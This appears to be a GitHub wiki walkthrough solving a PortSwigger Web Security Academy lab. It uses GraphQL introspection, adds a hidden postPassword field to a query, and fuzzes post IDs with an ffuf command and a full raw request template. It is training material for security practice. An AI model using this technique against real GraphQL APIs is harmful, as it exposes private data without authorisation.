GraphQL API vulnerabilities - gachikuku/portswigger GitHub Wiki

Apprentice lab:
Accessing private GraphQL posts

  • Solution

    1. View a random post.
    2. Observe the POST request made after clicking on a post, being a GraphQL endpoint.
    3. Run a full introspection query converting it to JSON using an online converter.
    4. Paste the response from the full introspection query into a GraphQL Visualizer.
    5. Notice there is a field postPassword.
    6. Add a postPassword field in the GraphQL query, notice the response will show the "postPassword":null.
    7. Fuzz for post id.
      ffuf -request request.txt -w range.txt -fr "null"
      request.txt 
      POST https://uuid.web-security-academy.net/graphql/v1 HTTP/2.0
user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br, zstd
referer: https://uuid.web-security-academy.net/post?postId=FUZZ
content-type: application/json
content-length: 285
origin: https://uuid.web-security-academy.net
cookie: session=3E9a6r6L5beUVP4B8Zn3WxYRbJM9ww67␍
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-origin
priority: u=4
te: trailers

{
  "query": "\n    query getBlogPost($id: Int!) {\n        getBlogPost(id: $id) {\n            image\n            title\n            author\n            date\n            paragraphs\n        postPassword\n}\n    }",
  "operationName": "getBlogPost",
  "variables": {
    "id": FUZZ
  }
}
    8. Submit post password to the lab.

Solutions for the Portswigger's Web Security Academy using mitmproxy and other cli tools instead of Burp Suite

⚠️ **GitHub.com Fallback** ⚠️